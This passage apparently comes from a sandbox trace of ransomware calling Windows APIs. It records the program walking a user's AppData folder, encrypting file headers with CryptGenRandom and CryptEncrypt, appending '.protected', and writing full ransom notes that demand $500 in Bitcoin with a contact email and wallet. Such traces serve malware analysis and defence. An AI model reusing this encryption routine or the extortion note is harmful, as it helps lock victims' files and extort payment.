lstrcmpiW (lpString1="iczqBiWGVNp4VQ8_u7f.odp", lpString2="Program Files") returned -1 [0089.754] lstrcmpiW (lpString1="iczqBiWGVNp4VQ8_u7f.odp", lpString2="Program Files (x86)") returned -1 [0089.755] lstrcmpiW (lpString1="iczqBiWGVNp4VQ8_u7f.odp", lpString2="$Recycle.bin") returned 1 [0089.755] lstrcmpiW (lpString1="iczqBiWGVNp4VQ8_u7f.odp", lpString2="System Volume Information") returned -1 [0089.755] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\iczqBiWGVNp4VQ8_u7f.odp") returned 73 [0089.755] StrStrIW (lpFirst="iczqBiWGVNp4VQ8_u7f.odp", lpSrch=".protected") returned 0x0 [0089.755] lstrcmpW (lpString1="iczqBiWGVNp4VQ8_u7f.odp", lpString2="RESTORE_FILES.txt") returned -1 [0089.755] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0089.755] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0089.757] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\iczqBiWGVNp4VQ8_u7f.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\iczqbiwgvnp4vq8_u7f.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0089.757] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\iczqBiWGVNp4VQ8_u7f.odp") returned 73 [0089.757] StrStrW (lpFirst="iczqBiWGVNp4VQ8_u7f.odp", lpSrch=".txt") returned 0x0 [0089.757] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\iczqBiWGVNp4VQ8_u7f.odp") returned 73 [0089.757] StrStrW (lpFirst="iczqBiWGVNp4VQ8_u7f.odp", lpSrch=".rar") returned 0x0 [0089.757] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\iczqBiWGVNp4VQ8_u7f.odp") returned 73 [0089.757] StrStrW (lpFirst="iczqBiWGVNp4VQ8_u7f.odp", lpSrch=".zip") returned 0x0 [0089.757] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x256d, lpOverlapped=0x0) returned 1 [0089.758] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffda93, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.758] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x256d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x256d, lpOverlapped=0x0) returned 1 [0089.759] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.759] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0089.759] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0089.759] CloseHandle (hObject=0xd4) returned 1 [0089.760] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\iczqBiWGVNp4VQ8_u7f.odp.protected") returned 83 [0089.760] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\iczqBiWGVNp4VQ8_u7f.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\iczqbiwgvnp4vq8_u7f.odp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\iczqBiWGVNp4VQ8_u7f.odp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\iczqbiwgvnp4vq8_u7f.odp.protected")) returned 1 [0089.768] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0089.768] lstrcmpiW (lpString1="Identities", lpString2="Windows") returned -1 [0089.768] lstrcmpiW (lpString1="Identities", lpString2="Program Files") returned -1 [0089.768] lstrcmpiW (lpString1="Identities", lpString2="Program Files (x86)") returned -1 [0089.768] lstrcmpiW (lpString1="Identities", lpString2="$Recycle.bin") returned 1 [0089.768] lstrcmpiW (lpString1="Identities", lpString2="System Volume Information") returned -1 [0089.768] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities") returned 60 [0089.768] lstrcmpW (lpString1="Identities", lpString2=".") returned 1 [0089.768] lstrcmpW (lpString1="Identities", lpString2="..") returned 1 [0089.768] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\*") returned 62 [0089.768] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0089.769] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.769] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.769] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.769] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.769] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.769] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\.") returned 62 [0089.769] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.769] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.769] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.769] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.769] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.769] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.769] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.769] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\..") returned 63 [0089.769] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.769] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.769] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.769] lstrcmpiW (lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpString2="Windows") returned -1 [0089.769] lstrcmpiW (lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpString2="Program Files") returned -1 [0089.769] lstrcmpiW (lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpString2="Program Files (x86)") returned -1 [0089.769] lstrcmpiW (lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpString2="$Recycle.bin") returned 1 [0089.769] lstrcmpiW (lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpString2="System Volume Information") returned -1 [0089.769] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}") returned 99 [0089.769] lstrcmpW (lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpString2=".") returned 1 [0089.769] lstrcmpW (lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpString2="..") returned 1 [0089.770] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*") returned 101 [0089.770] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0089.770] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.770] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.770] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.770] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.770] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.770] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\.") returned 101 [0089.770] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.770] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.770] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.770] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.770] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.770] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.770] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.770] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\..") returned 102 [0089.770] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.771] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.771] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0089.771] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0089.771] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\RESTORE_FILES.txt") returned 117 [0089.771] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\identities\\{31810c36-5d23-4cce-a3b4-316ded195c38}\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0089.772] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.772] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0089.775] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.775] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0089.775] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.775] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0089.776] CloseHandle (hObject=0xd8) returned 1 [0089.776] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0089.776] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0089.776] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\RESTORE_FILES.txt") returned 78 [0089.776] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\identities\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0089.777] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.777] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0089.778] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.778] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0089.779] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.779] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0089.779] CloseHandle (hObject=0xd4) returned 1 [0089.779] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0089.779] lstrcmpiW (lpString1="Ko6mG1GJe.pps", lpString2="Windows") returned -1 [0089.779] lstrcmpiW (lpString1="Ko6mG1GJe.pps", lpString2="Program Files") returned -1 [0089.779] lstrcmpiW (lpString1="Ko6mG1GJe.pps", lpString2="Program Files (x86)") returned -1 [0089.779] lstrcmpiW (lpString1="Ko6mG1GJe.pps", lpString2="$Recycle.bin") returned 1 [0089.779] lstrcmpiW (lpString1="Ko6mG1GJe.pps", lpString2="System Volume Information") returned -1 [0089.779] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ko6mG1GJe.pps") returned 63 [0089.779] StrStrIW (lpFirst="Ko6mG1GJe.pps", lpSrch=".protected") returned 0x0 [0089.779] lstrcmpW (lpString1="Ko6mG1GJe.pps", lpString2="RESTORE_FILES.txt") returned -1 [0089.779] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0089.779] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0089.779] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ko6mG1GJe.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ko6mg1gje.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0089.780] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ko6mG1GJe.pps") returned 63 [0089.780] StrStrW (lpFirst="Ko6mG1GJe.pps", lpSrch=".txt") returned 0x0 [0089.780] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ko6mG1GJe.pps") returned 63 [0089.780] StrStrW (lpFirst="Ko6mG1GJe.pps", lpSrch=".rar") returned 0x0 [0089.781] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ko6mG1GJe.pps") returned 63 [0089.781] StrStrW (lpFirst="Ko6mG1GJe.pps", lpSrch=".zip") returned 0x0 [0089.781] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.782] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.782] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.783] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.783] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0089.783] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0089.783] CloseHandle (hObject=0xd4) returned 1 [0089.786] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ko6mG1GJe.pps.protected") returned 73 [0089.786] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ko6mG1GJe.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ko6mg1gje.pps"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ko6mG1GJe.pps.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ko6mg1gje.pps.protected")) returned 1 [0089.788] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0089.788] lstrcmpiW (lpString1="lMoDm7a.bmp", lpString2="Windows") returned -1 [0089.788] lstrcmpiW (lpString1="lMoDm7a.bmp", lpString2="Program Files") returned -1 [0089.788] lstrcmpiW (lpString1="lMoDm7a.bmp", lpString2="Program Files (x86)") returned -1 [0089.788] lstrcmpiW (lpString1="lMoDm7a.bmp", lpString2="$Recycle.bin") returned 1 [0089.788] lstrcmpiW (lpString1="lMoDm7a.bmp", lpString2="System Volume Information") returned -1 [0089.788] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\lMoDm7a.bmp") returned 61 [0089.788] StrStrIW (lpFirst="lMoDm7a.bmp", lpSrch=".protected") returned 0x0 [0089.788] lstrcmpW (lpString1="lMoDm7a.bmp", lpString2="RESTORE_FILES.txt") returned -1 [0089.788] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0089.788] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0089.788] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\lMoDm7a.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lmodm7a.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0089.789] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\lMoDm7a.bmp") returned 61 [0089.789] StrStrW (lpFirst="lMoDm7a.bmp", lpSrch=".txt") returned 0x0 [0089.789] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\lMoDm7a.bmp") returned 61 [0089.789] StrStrW (lpFirst="lMoDm7a.bmp", lpSrch=".rar") returned 0x0 [0089.789] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\lMoDm7a.bmp") returned 61 [0089.789] StrStrW (lpFirst="lMoDm7a.bmp", lpSrch=".zip") returned 0x0 [0089.790] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.790] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.790] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, 